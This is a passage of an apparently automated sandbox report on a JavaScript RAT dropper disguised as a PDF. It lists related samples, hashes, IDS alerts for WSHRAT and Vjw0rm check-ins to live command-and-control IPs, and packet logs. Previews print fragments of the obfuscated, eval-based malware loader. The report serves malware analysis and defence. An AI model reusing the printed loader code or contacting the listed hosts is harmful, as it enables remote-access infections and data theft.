                                                            14:28:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            jemyy.theworkpc.comRFQ_SANOVIT.jsGet hashmaliciousWSHRat, VjW0rmBrowse
                                                            • 109.248.144.199
                                                            neworder.jsGet hashmaliciousWSHRat, VjW0rmBrowse
                                                            • 109.248.151.143
                                                            New_DHL_Shipment_Document_Arrival_Notice_Shipping_Documents_Original_BL,_Invoice_&_Packing_List.jsGet hashmaliciousWSHRat, VjW0rmBrowse
                                                            • 109.248.144.235
                                                            swift_copy.PDF.jsGet hashmaliciousVjW0rmBrowse
                                                            • 109.248.144.235
                                                            Purchaseorder.jsGet hashmaliciousWSHRat, VjW0rmBrowse
                                                            • 109.248.144.235
                                                            neworder.jsGet hashmaliciousWSHRat, VjW0rmBrowse
                                                            • 109.248.144.235
                                                            ShippingLabel.jsGet hashmaliciousWSHRat, VjW0rmBrowse
                                                            • 109.248.144.235
                                                            Dhl_Authorisation_0471.jsGet hashmaliciousWSHRat, VjW0rmBrowse
                                                            • 109.248.144.235
                                                            ntrHCBLBIT.jsGet hashmaliciousVjW0rmBrowse
                                                            • 109.248.144.235
                                                            VQlpXNzQJz.jsGet hashmaliciousVjW0rmBrowse
                                                            • 109.248.144.235
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            DATACLUBLVhttps://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5Get hashmaliciousRemcosBrowse
                                                            • 46.183.222.118
                                                            Trommels.jsGet hashmaliciousWSHRATBrowse
                                                            • 46.183.223.46
                                                            https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:6604fc88-dc7a-4ae2-989d-f98c81c5e650Get hashmaliciousRemcosBrowse
                                                            • 46.183.223.84
                                                            Purchase Orders-Reg.jarGet hashmaliciousADWINDBrowse
                                                            • 46.183.222.88
                                                            Inquiry 006042099.jsGet hashmaliciousWSHRat, VjW0rmBrowse
                                                            • 46.183.223.73
                                                            SecuriteInfo.com.W32.ModiLoader.YK.tr.11853.21891.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            • 46.183.222.54
                                                            S0A_RAH2024-900377.exeGet hashmaliciousRemcosBrowse
                                                            • 109.248.150.210
                                                            27 payment swift copy of the remaining paymen.jarGet hashmaliciousADWINDBrowse
                                                            • 46.183.223.64
                                                            SecuriteInfo.com.Win32.DropperX-gen.10565.11333.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            • 46.183.223.49
                                                            https://koithebd.com/admin/Scanned_document_836736373.TarGet hashmaliciousDBatLoader, RemcosBrowse
                                                            • 109.248.151.213
                                                            TERASYST-ASBGNDPS70IhR2.exeGet hashmaliciousZhark RATBrowse
                                                            • 94.156.69.176
                                                            copy_106_10210_31.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                                            • 94.156.65.181
                                                            2023 Univ of St Augustine W-2.pdf.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                            • 94.156.65.234
                                                            nigalmuchmuchi.exeGet hashmaliciousXWormBrowse
                                                            • 94.156.65.234
                                                            SecuriteInfo.com.FileRepMalware.5394.19333.elfGet hashmaliciousXmrigBrowse
                                                            • 94.156.65.212
                                                            SecuriteInfo.com.FileRepMalware.29234.18634.elfGet hashmaliciousUnknownBrowse
                                                            • 94.156.65.212
                                                            SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elfGet hashmaliciousUnknownBrowse
                                                            • 94.156.65.212
                                                            file.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 94.156.64.26
                                                            jxNFOZH76s.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 94.156.65.108
                                                            7n4JyfzR1U.exeGet hashmaliciousRHADAMANTHYS, SmokeLoaderBrowse
                                                            • 94.156.65.121
                                                            No context
                                                            No context
                                                            Process:C:\Windows\System32\wscript.exe
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):3953355
                                                            Entropy (8bit):4.737472291138197
                                                            Encrypted:false
                                                            SSDEEP:49152:DVz6cMuHZupT2iUkP6qOyJdCt6x9loTDW6bK53j+ji48++M0fTW/JDy4TaERYUbB:V
                                                            MD5:6812D6FBA47ADABB337563CA20FA84F8
                                                            SHA1:2AB5B312C71F2A60D53C16FAD7690291EA6D5BB0
                                                            SHA-256:6AC96E55099F4737D755E8CAA4A03A4AD47FAEC1E7D133C3EB67C9A7057CD574
                                                            SHA-512:63D595755DDB4F6B680FB41068F285FBFA6B87D508B7EFE1C2F481E70722A2D08669F15B08E362E8DB0FDBD85F84796D1F1DD48717C7BF6392055DBBEDFEAEAE
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview:function _0x4c21(){var _0x5140ea=['N1WHowZ2','GljaXhpW','1NncEtDa','1FsakxsO','SHQ5T3pz','wZ2RUdER','NWbzdjMD','VHR5UkNo','ml4dFlTe','1FsblFpN','TzNaVUtH','Z3hKaVpp','Q2huTEdG','ZrS0dFcE','SkNRazdE','mlaaVF5N','zSkRQU0J','vSkNRa05','ES0dFcER','pDV1pFTG','sZShmaWx','dFc1l5eG','MR01zYUN','JqZFNoaE','ndVajE3Z','yBSZWdFe','zMHNhajE','5MbDg5SU','DZ3hKaVl','WxBb1Z5e','zdiV1lvW','vS1R0dFN','GIyNGdSR','3BPMFJOS','NCmlmKG9','NFb2RDa0','0NCn0NCn','1JwYjI0Z','aG5lQ3hv','DBnSjB4N','ejBnZTMw','0NRa05DZ','pLREVtSm','3BJS0dJc','mxhaWdwT','URhemRFV','UzVmTEc1','oWVM1Zkt','d0dyaWRM','kxHY3Nke','dkcUxsOD','nZVVk5yT','Qm1ZV3h6','rSkNRbHB','bGxiSE5s','S0dJc1lT','ndZejE3Z','jVLR01wT','wS0NYc05','kV3hzTEh','0pmUTBLQ','nNjMlVzT','3hKaVpuT','GthVDE3Z','yZzlJR2x','lwRFFvSm','OFgzSkpR','lNlaWhoS','UWtKQ1Ew','Tm1LR3RE','M3YlhFdV','3NhM01zY','NGaExsOH','N4blpEMT','VpoTGw4c','pVnk1Zkx','JhaWhuTG','dGlkeTVm','gL0lNICI','EUW9KQ1h','HM3RFFvS','lBTQjZPM','WlN3eExE','UFNCaVVp','2NzWXl4a','ZWVlZSl7','XeHNLUTB','N4bmNqMT
                                                            Process:C:\Windows\System32\wscript.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            Process:C:\Windows\System32\wscript.exe
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):3953355
                                                            Entropy (8bit):4.737472291138197
                                                            Encrypted:false
                                                            SSDEEP:49152:DVz6cMuHZupT2iUkP6qOyJdCt6x9loTDW6bK53j+ji48++M0fTW/JDy4TaERYUbB:V
                                                            MD5:6812D6FBA47ADABB337563CA20FA84F8
                                                            SHA1:2AB5B312C71F2A60D53C16FAD7690291EA6D5BB0
                                                            SHA-256:6AC96E55099F4737D755E8CAA4A03A4AD47FAEC1E7D133C3EB67C9A7057CD574
                                                            SHA-512:63D595755DDB4F6B680FB41068F285FBFA6B87D508B7EFE1C2F481E70722A2D08669F15B08E362E8DB0FDBD85F84796D1F1DD48717C7BF6392055DBBEDFEAEAE
                                                            Malicious:true
                                                            Preview:function _0x4c21(){var _0x5140ea=['N1WHowZ2','GljaXhpW','1NncEtDa','1FsakxsO','SHQ5T3pz','wZ2RUdER','NWbzdjMD','VHR5UkNo','ml4dFlTe','1FsblFpN','TzNaVUtH','Z3hKaVpp','Q2huTEdG','ZrS0dFcE','SkNRazdE','mlaaVF5N','zSkRQU0J','vSkNRa05','ES0dFcER','pDV1pFTG','sZShmaWx','dFc1l5eG','MR01zYUN','JqZFNoaE','ndVajE3Z','yBSZWdFe','zMHNhajE','5MbDg5SU','DZ3hKaVl','WxBb1Z5e','zdiV1lvW','vS1R0dFN','GIyNGdSR','3BPMFJOS','NCmlmKG9','NFb2RDa0','0NCn0NCn','1JwYjI0Z','aG5lQ3hv','DBnSjB4N','ejBnZTMw','0NRa05DZ','pLREVtSm','3BJS0dJc','mxhaWdwT','URhemRFV','UzVmTEc1','oWVM1Zkt','d0dyaWRM','kxHY3Nke','dkcUxsOD','nZVVk5yT','Qm1ZV3h6','rSkNRbHB','bGxiSE5s','S0dJc1lT','ndZejE3Z','jVLR01wT','wS0NYc05','kV3hzTEh','0pmUTBLQ','nNjMlVzT','3hKaVpuT','GthVDE3Z','yZzlJR2x','lwRFFvSm','OFgzSkpR','lNlaWhoS','UWtKQ1Ew','Tm1LR3RE','M3YlhFdV','3NhM01zY','NGaExsOH','N4blpEMT','VpoTGw4c','pVnk1Zkx','JhaWhuTG','dGlkeTVm','gL0lNICI','EUW9KQ1h','HM3RFFvS','lBTQjZPM','WlN3eExE','UFNCaVVp','2NzWXl4a','ZWVlZSl7','XeHNLUTB','N4bmNqMT
                                                            Process:C:\Windows\System32\wscript.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:false
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            Process:C:\Windows\System32\wscript.exe
                                                            File Type:ASCII text, with very long lines (8120), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):354403
                                                            Entropy (8bit):4.638001351512122
                                                            Encrypted:false
                                                            SSDEEP:6144:eQfPBx5q0sQ1o7rsbHC01mDBpNW2mTMSbpuV8IW:eQ3B7qgpx
                                                            MD5:EF0B971AE6F0713AD41A7774539BB787
                                                            SHA1:30E622C882A4E44B193D36C1A81D78850FE70C00
                                                            SHA-256:62563B71EED9B8356F69BF8BA95E4664D6F936E485975D19CB04E7F456495FD3
                                                            SHA-512:D9308BB70542E0EA6F080F5A2EAFC528DD037FEFE3A4B83A29721B161212572DB27E20FA0D08D03DAC0AE1691DD0F7C40471AB03D886158305D12BA4F48D1DC2
                                                            Malicious:true
                                                            Preview:var e,f,d;..(function()..{...function kn()...{....return eval...}...function kl()...{....return d...}...function km()...{....return e...}...function ko()...{....return f...}...function kp()...{....return WSH...}...function kk()...{....return a...}...function kj(a,b)...{....return a=== b...}...function kg(a,b)...{....return a+ b...}...function kh(a,b)...{....return a< b...}...function ki(a,b)...{....return a== b...}...function a()...{....var a={};....var c={};....c= b(a);a._= c;(a._)()...}...if(!a)...{....(function()....{.....a= 0....}....)();return...}...else ...{....(a)()...}......function b(b)...{....return function()....{.....var h={};.....var i={};.....var j={};.....i= c();j= g(h,b);h._= j;if(ki(a,false)).....{......kq();return.....}..........(h._)()....}.......}...function kq()...{....a= false...}...function c()...{....return function()....{.....var b={};.....for(var a=0;kh(a,arguments.length);a+= 2).....{......b[arguments[a]]= arguments[kg(a,1)].....}..........return b....}....
                                                            Process:C:\Windows\System32\wscript.exe
                                                            File Type:ASCII text, with very long lines (8120), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):354403
                                                            Entropy (8bit):4.638001351512122
                                                            Encrypted:false
                                                            SSDEEP:6144:eQfPBx5q0sQ1o7rsbHC01mDBpNW2mTMSbpuV8IW:eQ3B7qgpx
                                                            MD5:EF0B971AE6F0713AD41A7774539BB787
                                                            SHA1:30E622C882A4E44B193D36C1A81D78850FE70C00
                                                            SHA-256:62563B71EED9B8356F69BF8BA95E4664D6F936E485975D19CB04E7F456495FD3
                                                            SHA-512:D9308BB70542E0EA6F080F5A2EAFC528DD037FEFE3A4B83A29721B161212572DB27E20FA0D08D03DAC0AE1691DD0F7C40471AB03D886158305D12BA4F48D1DC2
                                                            Malicious:true
                                                            Preview:var e,f,d;..(function()..{...function kn()...{....return eval...}...function kl()...{....return d...}...function km()...{....return e...}...function ko()...{....return f...}...function kp()...{....return WSH...}...function kk()...{....return a...}...function kj(a,b)...{....return a=== b...}...function kg(a,b)...{....return a+ b...}...function kh(a,b)...{....return a< b...}...function ki(a,b)...{....return a== b...}...function a()...{....var a={};....var c={};....c= b(a);a._= c;(a._)()...}...if(!a)...{....(function()....{.....a= 0....}....)();return...}...else ...{....(a)()...}......function b(b)...{....return function()....{.....var h={};.....var i={};.....var j={};.....i= c();j= g(h,b);h._= j;if(ki(a,false)).....{......kq();return.....}..........(h._)()....}.......}...function kq()...{....a= false...}...function c()...{....return function()....{.....var b={};.....for(var a=0;kh(a,arguments.length);a+= 2).....{......b[arguments[a]]= arguments[kg(a,1)].....}..........return b....}....
                                                            File type:ASCII text, with very long lines (65536), with no line terminators
                                                            Entropy (8bit):4.737472291138197
                                                            TrID:
                                                              File name:34003198.pdf.js
                                                              File size:3'953'355 bytes
                                                              MD5:6812d6fba47adabb337563ca20fa84f8
                                                              SHA1:2ab5b312c71f2a60d53c16fad7690291ea6d5bb0
                                                              SHA256:6ac96e55099f4737d755e8caa4a03a4ad47faec1e7d133c3eb67c9a7057cd574
                                                              SHA512:63d595755ddb4f6b680fb41068f285fbfa6b87d508b7efe1c2f481e70722a2d08669f15b08e362e8db0fdbd85f84796d1f1dd48717c7bf6392055dbbedfeaeae
                                                              SSDEEP:49152:DVz6cMuHZupT2iUkP6qOyJdCt6x9loTDW6bK53j+ji48++M0fTW/JDy4TaERYUbB:V
                                                              TLSH:C3068C817AA1DD9B511B9B63AF1A90E4DF1B3D289149ACFAF0403C90D1CD7BFE5A01B4
                                                              File Content Preview:function _0x4c21(){var _0x5140ea=['N1WHowZ2','GljaXhpW','1NncEtDa','1FsakxsO','SHQ5T3pz','wZ2RUdER','NWbzdjMD','VHR5UkNo','ml4dFlTe','1FsblFpN','TzNaVUtH','Z3hKaVpp','Q2huTEdG','ZrS0dFcE','SkNRazdE','mlaaVF5N','zSkRQU0J','vSkNRa05','ES0dFcER','pDV1pFTG','
                                                              Icon Hash:68d69b8bb6aa9a86
                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              04/19/24-15:28:38.781042TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497511604192.168.2.494.156.71.108
                                                              04/19/24-15:28:56.289406TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497581604192.168.2.494.156.71.108
                                                              04/19/24-15:29:02.102084TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497611604192.168.2.494.156.71.108
                                                              04/19/24-15:28:44.611333TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497541604192.168.2.494.156.71.108
                                                              04/19/24-15:29:54.431929TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497781604192.168.2.494.156.71.108
                                                              04/19/24-15:29:13.745654TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497641604192.168.2.494.156.71.108
                                                              04/19/24-15:27:55.119296TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497311604192.168.2.494.156.71.108
                                                              04/19/24-15:29:30.996857TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497701604192.168.2.494.156.71.108
                                                              04/19/24-15:29:25.223069TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497681604192.168.2.494.156.71.108
                                                              04/19/24-15:29:42.605649TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497741604192.168.2.494.156.71.108
                                                              04/19/24-15:28:26.802190TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497471604192.168.2.494.156.71.108
                                                              04/19/24-15:28:32.505545TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497501604192.168.2.494.156.71.108
                                                              04/19/24-15:28:50.526021TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497571604192.168.2.494.156.71.108
                                                              04/19/24-15:29:02.031122TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497601604192.168.2.494.156.71.108
                                                              04/19/24-15:28:14.717719TCP2828283ETPRO TROJAN vjw0rm Checkin497415401192.168.2.4109.248.151.106
                                                              04/19/24-15:28:20.993334TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497441604192.168.2.494.156.71.108
                                                              04/19/24-15:29:07.984957TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497631604192.168.2.494.156.71.108
                                                              04/19/24-15:28:13.842546TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497401604192.168.2.494.156.71.108
                                                              04/19/24-15:29:19.753385TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497671604192.168.2.494.156.71.108
                                                              04/19/24-15:29:49.028843TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497771604192.168.2.494.156.71.108
                                                              04/19/24-15:29:37.267221TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497731604192.168.2.494.156.71.108
                                                              04/19/24-15:29:19.504394TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497661604192.168.2.494.156.71.108
                                                              04/19/24-15:27:55.840576TCP2828283ETPRO TROJAN vjw0rm Checkin497325401192.168.2.4109.248.151.106
                                                              04/19/24-15:28:25.746753TCP2828283ETPRO TROJAN vjw0rm Checkin497455401192.168.2.4109.248.151.106
                                                              04/19/24-15:28:26.640971TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497461604192.168.2.494.156.71.108
                                                              04/19/24-15:28:50.417544TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497561604192.168.2.494.156.71.108
                                                              04/19/24-15:29:36.802594TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497721604192.168.2.494.156.71.108
                                                              04/19/24-15:29:07.909979TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497621604192.168.2.494.156.71.108
                                                              04/19/24-15:28:20.524782TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497431604192.168.2.494.156.71.108
                                                              04/19/24-15:28:26.838700TCP2828283ETPRO TROJAN vjw0rm Checkin497485401192.168.2.4109.248.151.106
                                                              04/19/24-15:28:02.481379TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497331604192.168.2.494.156.71.108
                                                              04/19/24-15:29:48.531470TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497761604192.168.2.494.156.71.108
                                                              04/19/24-15:29:43.138963TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497751604192.168.2.494.156.71.108
                                                              04/19/24-15:28:09.257217TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497391604192.168.2.494.156.71.108
                                                              04/19/24-15:28:15.083134TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497421604192.168.2.494.156.71.108
                                                              04/19/24-15:29:13.936452TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497651604192.168.2.494.156.71.108
                                                              04/19/24-15:28:32.402481TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497491604192.168.2.494.156.71.108
                                                              04/19/24-15:28:38.924678TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497521604192.168.2.494.156.71.108
                                                              04/19/24-15:28:44.761206TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497551604192.168.2.494.156.71.108
                                                              04/19/24-15:29:25.681174TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497691604192.168.2.494.156.71.108
                                                              04/19/24-15:28:56.367338TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497591604192.168.2.494.156.71.108
                                                              04/19/24-15:27:51.758515TCP2828283ETPRO TROJAN vjw0rm Checkin497305401192.168.2.4109.248.151.106
                                                              04/19/24-15:29:31.465526TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497711604192.168.2.494.156.71.108
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Apr 19, 2024 15:27:51.534075022 CEST497305401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:27:51.758173943 CEST540149730109.248.151.106192.168.2.4
                                                              Apr 19, 2024 15:27:51.758249998 CEST497305401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:27:51.758514881 CEST497305401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:27:52.039473057 CEST540149730109.248.151.106192.168.2.4
                                                              Apr 19, 2024 15:27:54.779577017 CEST497311604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:27:55.118858099 CEST16044973194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:27:55.119029045 CEST497311604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:27:55.119296074 CEST497311604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:27:55.591873884 CEST16044973194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:27:55.616931915 CEST497325401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:27:55.840171099 CEST540149732109.248.151.106192.168.2.4
                                                              Apr 19, 2024 15:27:55.840322971 CEST497325401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:27:55.840575933 CEST497325401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:27:56.035691023 CEST16044973194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:27:56.035820961 CEST497311604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:27:56.035927057 CEST497311604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:27:56.120197058 CEST540149732109.248.151.106192.168.2.4
                                                              Apr 19, 2024 15:27:56.452801943 CEST16044973194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:02.179653883 CEST497331604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:02.480926037 CEST16044973394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:02.481040001 CEST497331604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:02.481379032 CEST497331604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:02.913108110 CEST16044973394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:02.913204908 CEST497331604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:02.913302898 CEST497331604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:03.256213903 CEST16044973394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:08.581984043 CEST497391604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:09.230067968 CEST16044973994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:09.230189085 CEST497391604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:09.257216930 CEST497391604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:09.576427937 CEST16044973994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:09.576607943 CEST497391604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:09.592840910 CEST497391604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:09.965934038 CEST16044973994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:13.544763088 CEST497401604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:13.842186928 CEST16044974094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:13.842314005 CEST497401604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:13.842545986 CEST497401604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:14.220143080 CEST16044974094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:14.220340014 CEST497401604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:14.220340014 CEST497401604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:14.494807959 CEST497415401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:28:14.606976986 CEST16044974094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:14.697236061 CEST497421604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:14.717449903 CEST540149741109.248.151.106192.168.2.4
                                                              Apr 19, 2024 15:28:14.717524052 CEST497415401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:28:14.717719078 CEST497415401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:28:14.995094061 CEST540149741109.248.151.106192.168.2.4
                                                              Apr 19, 2024 15:28:15.082601070 CEST16044974294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:15.082700014 CEST497421604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:15.083133936 CEST497421604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:15.473746061 CEST16044974294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:15.474200964 CEST497421604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:15.474247932 CEST497421604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:15.897248030 CEST16044974294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:20.252774954 CEST497431604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:20.522278070 CEST16044974394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:20.522375107 CEST497431604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:20.524781942 CEST497431604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:20.634316921 CEST497441604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:20.911290884 CEST16044974394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:20.911592960 CEST497431604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:20.911679029 CEST497431604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:20.988328934 CEST16044974494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:20.988435030 CEST497441604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:20.993334055 CEST497441604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:21.294507027 CEST16044974394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:21.371886015 CEST16044974494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:21.371980906 CEST497441604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:21.372071028 CEST497441604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:21.762521982 CEST16044974494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:25.520539045 CEST497455401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:28:25.745640993 CEST540149745109.248.151.106192.168.2.4
                                                              Apr 19, 2024 15:28:25.746537924 CEST497455401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:28:25.746752977 CEST497455401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:28:26.032768011 CEST540149745109.248.151.106192.168.2.4
                                                              Apr 19, 2024 15:28:26.370100021 CEST497461604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:26.530623913 CEST497471604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:26.613531113 CEST497485401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:28:26.640649080 CEST16044974694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:26.640758991 CEST497461604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:26.640970945 CEST497461604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:26.801678896 CEST16044974794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:26.801789045 CEST497471604192.168.2.494.156.71.108
